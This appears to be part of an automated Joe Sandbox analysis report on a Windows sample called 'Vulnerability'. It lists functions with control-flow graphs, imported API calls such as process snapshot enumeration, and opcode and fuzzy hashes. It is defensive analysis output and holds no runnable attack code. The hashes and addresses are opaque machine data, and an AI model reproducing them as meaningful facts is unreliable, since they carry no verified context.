                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process32$CloseCreateCurrentFirstHandleNextProcessSnapshotToolhelp32memset
                                                                                          • String ID:
                                                                                          • API String ID: 2672634495-0
                                                                                          • Opcode ID: 02cd4b5768b70284ca7aaefdfa948c9715f4c916770f4bda0e9fa637a8fe1042
                                                                                          • Instruction ID: c3f87f2e28f0f024160bf65524c1040e7b330cd6bf8bc42e107472b51bde7fb3
                                                                                          • Opcode Fuzzy Hash: 02cd4b5768b70284ca7aaefdfa948c9715f4c916770f4bda0e9fa637a8fe1042
                                                                                          • Instruction Fuzzy Hash: 72115121618AC182EA50EF25F44526AF761FB84BB4F849335E96F436D4DF3CEA45C710
                                                                                          Function 00007FF7CC411330 Relevance: 5.5, APIs: 4, Instructions: 505COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 825 7ff7cc411330-7ff7cc411385 826 7ff7cc411387 825->826 827 7ff7cc41139d-7ff7cc4113bd malloc 825->827 828 7ff7cc411390-7ff7cc41139b 826->828 829 7ff7cc411a57-7ff7cc411a69 827->829 830 7ff7cc4113c3-7ff7cc4113eb memmove 827->830 828->827 828->828 831 7ff7cc4113ed-7ff7cc4113ff memset 830->831 832 7ff7cc411404-7ff7cc41145b 830->832 831->832 833 7ff7cc4119c0-7ff7cc411a52 free 832->833 834 7ff7cc411461 832->834 833->829 835 7ff7cc411464-7ff7cc41172c 834->835 836 7ff7cc411730-7ff7cc411734 835->836 837 7ff7cc41174b-7ff7cc411752 836->837 838 7ff7cc411736-7ff7cc411749 836->838 840 7ff7cc41176f-7ff7cc411773 837->840 841 7ff7cc411754-7ff7cc41176d 837->841 839 7ff7cc411798-7ff7cc4117c8 838->839 845 7ff7cc4117ca-7ff7cc4117da 839->845 846 7ff7cc4117dc-7ff7cc4117e2 839->846 843 7ff7cc411788-7ff7cc411791 840->843 844 7ff7cc411775-7ff7cc411786 840->844 842 7ff7cc411795 841->842 842->839 843->842 844->842 847 7ff7cc411826-7ff7cc41184d 845->847 848 7ff7cc4117fe-7ff7cc411801 846->848 849 7ff7cc4117e4-7ff7cc4117fc 846->849 850 7ff7cc41184f-7ff7cc411861 847->850 851 7ff7cc411863-7ff7cc411869 847->851 853 7ff7cc411813-7ff7cc411820 848->853 854 7ff7cc411803-7ff7cc411811 848->854 852 7ff7cc411823 849->852 855 7ff7cc4118ac-7ff7cc4118d9 850->855 856 7ff7cc41186b-7ff7cc41187f 851->856 857 7ff7cc411881-7ff7cc411884 851->857 852->847 853->852 854->852 861 7ff7cc4118db-7ff7cc4118ec 855->861 862 7ff7cc4118ee-7ff7cc4118f4 855->862 858 7ff7cc4118a9 856->858 859 7ff7cc411899-7ff7cc4118a6 857->859 860 7ff7cc411886-7ff7cc411897 857->860 858->855 859->858 860->858 863 7ff7cc411931-7ff7cc411961 861->863 864 7ff7cc411909-7ff7cc41190c 862->864 865 7ff7cc4118f6-7ff7cc411907 862->865 863->836 866 7ff7cc411967-7ff7cc4119aa 863->866 868 7ff7cc41191e-7ff7cc41192b 864->868 869 7ff7cc41190e-7ff7cc41191c 864->869 867 7ff7cc41192e 865->867 866->835 870 7ff7cc4119b0-7ff7cc4119b8 866->870 867->863 868->867 869->867 870->833
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: freemallocmemmovememset
                                                                                          • String ID:
                                                                                          • API String ID: 1050734653-0
                                                                                          • Opcode ID: b571248dc4445a9d52385899018f1781bfa6bd60c9789f80331ab341d92d0fa1
                                                                                          • Instruction ID: 076c897bd56c9f61ec07774f87ee21154af4d69b947e774ee2e0e310497324b6
                                                                                          • Opcode Fuzzy Hash: b571248dc4445a9d52385899018f1781bfa6bd60c9789f80331ab341d92d0fa1
                                                                                          • Instruction Fuzzy Hash: E3121DA3A1C1E04AD77E9B2D54B467D7FE0E345345B48922EEBD7C3682D92CC214DB20
                                                                                          Function 00007FF7CC411B20 Relevance: 16.7, APIs: 11, Instructions: 197COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 540 7ff7cc411b20-7ff7cc411bc3 memset call 7ff7cc419790 ?tellg@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA?AV?$fpos@U_Mbstatet@@@2@XZ ?seekg@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@_JH@Z 543 7ff7cc411c37 540->543 544 7ff7cc411bc5-7ff7cc411bd2 540->544 545 7ff7cc411c3c-7ff7cc411c65 ?read@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@PEAD_J@Z ??Bios_base@std@@QEBA_NXZ 543->545 546 7ff7cc411bd8-7ff7cc411bdf 544->546 547 7ff7cc411e14-7ff7cc411e19 call 7ff7cc41d3b0 544->547 548 7ff7cc411c6b-7ff7cc411c76 call 7ff7cc411a70 545->548 549 7ff7cc411d2c-7ff7cc411d51 call 7ff7cc41c9f0 545->549 550 7ff7cc411c0a-7ff7cc411c12 call 7ff7cc424108 546->550 551 7ff7cc411be1-7ff7cc411be8 546->551 561 7ff7cc411c7b-7ff7cc411ca4 548->561 565 7ff7cc411d8a-7ff7cc411da0 call 7ff7cc411e20 549->565 566 7ff7cc411d53-7ff7cc411d60 549->566 564 7ff7cc411c15-7ff7cc411c35 memset 550->564 555 7ff7cc411e0e-7ff7cc411e13 call 7ff7cc411190 551->555 556 7ff7cc411bee call 7ff7cc424108 551->556 555->547 570 7ff7cc411bf3-7ff7cc411bf6 556->570 567 7ff7cc411cdd-7ff7cc411cf3 call 7ff7cc411e20 561->567 568 7ff7cc411ca6-7ff7cc411cb3 561->568 564->545 585 7ff7cc411dce-7ff7cc411e06 call 7ff7cc423fc0 565->585 588 7ff7cc411da2-7ff7cc411daf 565->588 571 7ff7cc411d7e-7ff7cc411d89 call 7ff7cc423fe0 566->571 572 7ff7cc411d62-7ff7cc411d75 566->572 584 7ff7cc411cf9-7ff7cc411d06 567->584 567->585 573 7ff7cc411cd1-7ff7cc411cdc call 7ff7cc423fe0 568->573 574 7ff7cc411cb5-7ff7cc411cc8 568->574 576 7ff7cc411d77-7ff7cc411d7d _invalid_parameter_noinfo_noreturn 570->576 577 7ff7cc411bfc-7ff7cc411c08 570->577 571->565 572->571 572->576 573->567 574->573 579 7ff7cc411cca-7ff7cc411cd0 _invalid_parameter_noinfo_noreturn 574->579 576->571 577->564 579->573 589 7ff7cc411dc9 call 7ff7cc423fe0 584->589 591 7ff7cc411d0c-7ff7cc411d1f 584->591 588->589 590 7ff7cc411db1-7ff7cc411dc4 588->590 589->585 593 7ff7cc411e07-7ff7cc411e0d _invalid_parameter_noinfo_noreturn 590->593 594 7ff7cc411dc6 590->594 591->594 595 7ff7cc411d25-7ff7cc411d2b _invalid_parameter_noinfo_noreturn 591->595 593->555 594->589 595->549
                                                                                          APIs
                                                                                          • memset.VCRUNTIME140 ref: 00007FF7CC411B68
                                                                                            • Part of subcall function 00007FF7CC419790: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF7CC4197CC
                                                                                            • Part of subcall function 00007FF7CC419790: ??0?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF7CC4197EB
                                                                                            • Part of subcall function 00007FF7CC419790: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF7CC41981D
                                                                                            • Part of subcall function 00007FF7CC419790: ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF7CC419838
                                                                                            • Part of subcall function 00007FF7CC419790: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7CC419883
                                                                                          • ?tellg@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA?AV?$fpos@U_Mbstatet@@@2@XZ.MSVCP140 ref: 00007FF7CC411B8F
                                                                                          • ?seekg@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@_JH@Z.MSVCP140 ref: 00007FF7CC411BA9
                                                                                          • memset.VCRUNTIME140 ref: 00007FF7CC411C2B
                                                                                          • ?read@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@PEAD_J@Z.MSVCP140 ref: 00007FF7CC411C4A
                                                                                          • ??Bios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7CC411C5D
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CC411CCA
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CC411D25
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CC411D77
                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7CC411E0E
                                                                                            • Part of subcall function 00007FF7CC424108: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF7CC41CF43,?,?,?,?,?,0000000100000000,00007FF7CC4199B2), ref: 00007FF7CC424122
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CC411E07
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: U?$char_traits@$D@std@@@std@@$_invalid_parameter_noinfo_noreturn$memset$??0?$basic_ios@??0?$basic_istream@??0?$basic_streambuf@?read@?$basic_istream@?seekg@?$basic_istream@?setstate@?$basic_ios@?tellg@?$basic_istream@Bios_base@std@@Concurrency::cancel_current_taskD@std@@@1@_Init@?$basic_streambuf@Mbstatet@@@2@V12@V12@_V?$basic_streambuf@V?$fpos@malloc
                                                                                          • String ID:
                                                                                          • API String ID: 853152473-0
                                                                                          • Opcode ID: fc5682391a06681599dd8c0ec0363a3930f4d02f469e356cacbf85f879d10d5f
                                                                                          • Instruction ID: c7d01991541933c7d852523c016f945863c19084c6b52d368c4e1fee907ee9c9
                                                                                          • Opcode Fuzzy Hash: fc5682391a06681599dd8c0ec0363a3930f4d02f469e356cacbf85f879d10d5f
                                                                                          • Instruction Fuzzy Hash: DA71CC22B18AC181EA10EF15E4453BDE761EF85BF8F949631DA9D42AD6DF3CE584C310
                                                                                          Function 00007FF7CC41A7C0 Relevance: 16.7, APIs: 11, Instructions: 174COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 598 7ff7cc41a7c0-7ff7cc41a7ea 599 7ff7cc41a7f0-7ff7cc41a7f7 598->599 599->599 600 7ff7cc41a7f9-7ff7cc41a808 599->600 601 7ff7cc41a80a-7ff7cc41a80d 600->601 602 7ff7cc41a814 600->602 601->602 603 7ff7cc41a80f-7ff7cc41a812 601->603 604 7ff7cc41a816-7ff7cc41a826 602->604 603->604 605 7ff7cc41a828-7ff7cc41a82e 604->605 606 7ff7cc41a82f-7ff7cc41a841 ?good@ios_base@std@@QEBA_NXZ 604->606 605->606 607 7ff7cc41a873-7ff7cc41a879 606->607 608 7ff7cc41a843-7ff7cc41a852 606->608 609 7ff7cc41a87b-7ff7cc41a880 607->609 610 7ff7cc41a885-7ff7cc41a8b3 ?getloc@ios_base@std@@QEBA?AVlocale@2@XZ call 7ff7cc41caf0 607->610 612 7ff7cc41a871 608->612 613 7ff7cc41a854-7ff7cc41a857 608->613 614 7ff7cc41a9d7-7ff7cc41a9f5 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z ?uncaught_exception@std@@YA_NXZ 609->614 622 7ff7cc41a8d1-7ff7cc41a8ea 610->622 623 7ff7cc41a8b5-7ff7cc41a8be 610->623 612->607 613->612 616 7ff7cc41a859-7ff7cc41a86f ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ ?good@ios_base@std@@QEBA_NXZ 613->616 617 7ff7cc41a9f7-7ff7cc41aa00 ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ 614->617 618 7ff7cc41aa01-7ff7cc41aa10 614->618 616->607 617->618 620 7ff7cc41aa19-7ff7cc41aa2b 618->620 621 7ff7cc41aa12-7ff7cc41aa18 618->621 621->620 624 7ff7cc41a8ec 622->624 625 7ff7cc41a920-7ff7cc41a925 622->625 623->622 634 7ff7cc41a8c0-7ff7cc41a8cb 623->634 630 7ff7cc41a8f0-7ff7cc41a8f3 624->630 626 7ff7cc41a9ac-7ff7cc41a9bc 625->626 627 7ff7cc41a92b-7ff7cc41a92e 625->627 633 7ff7cc41a9d2 626->633 631 7ff7cc41a980-7ff7cc41a983 627->631 632 7ff7cc41a930-7ff7cc41a973 ?widen@?$ctype@_W@std@@QEBA_WD@Z ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z 627->632 630->625 635 7ff7cc41a8f5-7ff7cc41a910 ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z 630->635 631->626 637 7ff7cc41a985-7ff7cc41a9a0 ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z 631->637 636 7ff7cc41a917-7ff7cc41a91e 632->636 633->614 634->622 638 7ff7cc41a912 635->638 639 7ff7cc41a975-7ff7cc41a978 635->639 636->625 640 7ff7cc41a9be-7ff7cc41a9c1 637->640 641 7ff7cc41a9a2-7ff7cc41a9a5 637->641 638->636 639->630 640->631 640->633 641->626
                                                                                          APIs
                                                                                          • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7CC41A839
                                                                                          • ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF7CC41A859
                                                                                          • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7CC41A869
                                                                                          • ?getloc@ios_base@std@@QEBA?AVlocale@2@XZ.MSVCP140 ref: 00007FF7CC41A894
                                                                                            • Part of subcall function 00007FF7CC41CAF0: ??0_Lockit@std@@QEAA@H@Z.MSVCP140 ref: 00007FF7CC41CB1D
                                                                                            • Part of subcall function 00007FF7CC41CAF0: ??Bid@locale@std@@QEAA_KXZ.MSVCP140 ref: 00007FF7CC41CB37
                                                                                            • Part of subcall function 00007FF7CC41CAF0: ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ.MSVCP140 ref: 00007FF7CC41CB69
                                                                                            • Part of subcall function 00007FF7CC41CAF0: ?_Getcat@?$ctype@_W@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z.MSVCP140 ref: 00007FF7CC41CB94
                                                                                            • Part of subcall function 00007FF7CC41CAF0: std::_Facet_Register.LIBCPMT ref: 00007FF7CC41CBAD
                                                                                            • Part of subcall function 00007FF7CC41CAF0: ??1_Lockit@std@@QEAA@XZ.MSVCP140 ref: 00007FF7CC41CBCC
                                                                                          • ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140 ref: 00007FF7CC41A906
                                                                                          • ?widen@?$ctype@_W@std@@QEBA_WD@Z.MSVCP140 ref: 00007FF7CC41A94E
                                                                                          • ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140 ref: 00007FF7CC41A95C
                                                                                          • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7CC41A9E6
                                                                                          • ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF7CC41A9ED
                                                                                          • ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF7CC41A9FA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: U?$char_traits@_W@std@@@std@@$?good@ios_base@std@@?sputc@?$basic_streambuf@_Lockit@std@@W@std@@$??0_??1_?flush@?$basic_ostream@_?getloc@ios_base@std@@?setstate@?$basic_ios@?uncaught_exception@std@@?widen@?$ctype@_Bid@locale@std@@D@std@@@std@@Facet_Getcat@?$ctype@_Getgloballocale@locale@std@@Locimp@12@Osfx@?$basic_ostream@_RegisterU?$char_traits@V12@V42@@Vfacet@locale@2@Vlocale@2@std::_
                                                                                          • String ID:
                                                                                          • API String ID: 2572325179-0
                                                                                          • Opcode ID: 5b82106a4d90c24c8c54ad93136dbb8eb2f6675c61dc4e6f90e05876f26f347a
                                                                                          • Instruction ID: 21b220cebd2acda994605e0c82a3b6f42ea038bbc62c32fd804fa2ab8aec0e6b
                                                                                          • Opcode Fuzzy Hash: 5b82106a4d90c24c8c54ad93136dbb8eb2f6675c61dc4e6f90e05876f26f347a
                                                                                          • Instruction Fuzzy Hash: 16613223609AC185EB20AF1AD590239EBA0FF85FA9F55C532CE8E43761CF3DD5868310
                                                                                          Function 00007FF7CC41A3C0 Relevance: 13.6, APIs: 9, Instructions: 138COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 642 7ff7cc41a3c0-7ff7cc41a3ef 643 7ff7cc41a3f0-7ff7cc41a3f8 642->643 643->643 644 7ff7cc41a3fa-7ff7cc41a409 643->644 645 7ff7cc41a40b-7ff7cc41a40e 644->645 646 7ff7cc41a415 644->646 645->646 647 7ff7cc41a410-7ff7cc41a413 645->647 648 7ff7cc41a417-7ff7cc41a427 646->648 647->648 649 7ff7cc41a429-7ff7cc41a42f 648->649 650 7ff7cc41a430-7ff7cc41a442 ?good@ios_base@std@@QEBA_NXZ 648->650 649->650 651 7ff7cc41a474-7ff7cc41a47a 650->651 652 7ff7cc41a444-7ff7cc41a453 650->652 656 7ff7cc41a47c-7ff7cc41a481 651->656 657 7ff7cc41a486-7ff7cc41a49f 651->657 654 7ff7cc41a472 652->654 655 7ff7cc41a455-7ff7cc41a458 652->655 654->651 655->654 658 7ff7cc41a45a-7ff7cc41a470 ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ ?good@ios_base@std@@QEBA_NXZ 655->658 659 7ff7cc41a53e-7ff7cc41a55c ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z ?uncaught_exception@std@@YA_NXZ 656->659 660 7ff7cc41a4cf-7ff7cc41a4ea ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z 657->660 661 7ff7cc41a4a1-7ff7cc41a4a4 657->661 658->651 664 7ff7cc41a568-7ff7cc41a578 659->664 665 7ff7cc41a55e-7ff7cc41a567 ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ 659->665 662 7ff7cc41a517 660->662 663 7ff7cc41a4ec 660->663 661->660 666 7ff7cc41a4a6-7ff7cc41a4c1 ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z 661->666 672 7ff7cc41a51a 662->672 669 7ff7cc41a4f0-7ff7cc41a4f3 663->669 670 7ff7cc41a57a-7ff7cc41a580 664->670 671 7ff7cc41a581-7ff7cc41a59b 664->671 665->664 667 7ff7cc41a4ca-7ff7cc41a4cd 666->667 668 7ff7cc41a4c3-7ff7cc41a4c8 666->668 667->661 668->672 673 7ff7cc41a51e-7ff7cc41a52e 669->673 674 7ff7cc41a4f5-7ff7cc41a510 ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z 669->674 670->671 672->673 673->659 674->662 675 7ff7cc41a512-7ff7cc41a515 674->675 675->669
                                                                                          APIs
                                                                                          • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7CC41A43A
                                                                                          • ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF7CC41A45A
                                                                                          • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7CC41A46A
                                                                                          • ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140 ref: 00007FF7CC41A4B7
                                                                                          • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140 ref: 00007FF7CC41A4E1
                                                                                          • ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140 ref: 00007FF7CC41A506
                                                                                          • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7CC41A54D
                                                                                          • ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF7CC41A554
                                                                                          • ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF7CC41A561
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: U?$char_traits@_W@std@@@std@@$?good@ios_base@std@@?sputc@?$basic_streambuf@_D@std@@@std@@U?$char_traits@$?flush@?$basic_ostream@_?setstate@?$basic_ios@?sputn@?$basic_streambuf@?uncaught_exception@std@@Osfx@?$basic_ostream@_V12@
                                                                                          • String ID:
                                                                                          • API String ID: 1082002092-0
                                                                                          • Opcode ID: ef2d79dececa04f2a13e11419a62dfe81de786ebe0591a841e3a6f70c526b580
                                                                                          • Instruction ID: a791166c8d2a352a899cdfcf880dbd3688e6750f704772be9dfa839cc7dc7e5a
                                                                                          • Opcode Fuzzy Hash: ef2d79dececa04f2a13e11419a62dfe81de786ebe0591a841e3a6f70c526b580
                                                                                          • Instruction Fuzzy Hash: E3511833608AC181EB609F1AD594239EBA0FF84FA9B65C531DE8E437A5CF3DD5868310
                                                                                          Function 00007FF7CC41D590 Relevance: 13.6, APIs: 9, Instructions: 134COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 677 7ff7cc41d590-7ff7cc41d5ca 678 7ff7cc41d5cc-7ff7cc41d5cf 677->678 679 7ff7cc41d5d6 677->679 678->679 680 7ff7cc41d5d1-7ff7cc41d5d4 678->680 681 7ff7cc41d5d8-7ff7cc41d5e8 679->681 680->681 682 7ff7cc41d5ea-7ff7cc41d5f0 681->682 683 7ff7cc41d5f1-7ff7cc41d603 ?good@ios_base@std@@QEBA_NXZ 681->683 682->683 684 7ff7cc41d635-7ff7cc41d63b 683->684 685 7ff7cc41d605-7ff7cc41d614 683->685 688 7ff7cc41d647-7ff7cc41d660 684->688 689 7ff7cc41d63d-7ff7cc41d642 684->689 686 7ff7cc41d633 685->686 687 7ff7cc41d616-7ff7cc41d619 685->687 686->684 687->686 691 7ff7cc41d61b-7ff7cc41d631 ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ ?good@ios_base@std@@QEBA_NXZ 687->691 693 7ff7cc41d662-7ff7cc41d665 688->693 694 7ff7cc41d694-7ff7cc41d6af ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z 688->694 692 7ff7cc41d6ff-7ff7cc41d71d ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z ?uncaught_exception@std@@YA_NXZ 689->692 691->684 695 7ff7cc41d729-7ff7cc41d738 692->695 696 7ff7cc41d71f-7ff7cc41d728 ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ 692->696 693->694 697 7ff7cc41d667-7ff7cc41d682 ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z 693->697 698 7ff7cc41d6d8-7ff7cc41d6db 694->698 699 7ff7cc41d6b1-7ff7cc41d6b4 694->699 701 7ff7cc41d73a-7ff7cc41d740 695->701 702 7ff7cc41d741-7ff7cc41d75b 695->702 696->695 703 7ff7cc41d68f-7ff7cc41d692 697->703 704 7ff7cc41d684-7ff7cc41d68d 697->704 700 7ff7cc41d6df-7ff7cc41d6ef 698->700 699->700 705 7ff7cc41d6b6-7ff7cc41d6d1 ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z 699->705 700->692 701->702 703->693 704->699 705->698 706 7ff7cc41d6d3-7ff7cc41d6d6 705->706 706->699
                                                                                          APIs
                                                                                          • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7CC41D5FB
                                                                                          • ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF7CC41D61B
                                                                                          • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7CC41D62B
                                                                                          • ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140 ref: 00007FF7CC41D678
                                                                                          • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140 ref: 00007FF7CC41D6A6
                                                                                          • ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140 ref: 00007FF7CC41D6C7
                                                                                          • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7CC41D70E
                                                                                          • ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF7CC41D715
                                                                                          • ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF7CC41D722
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
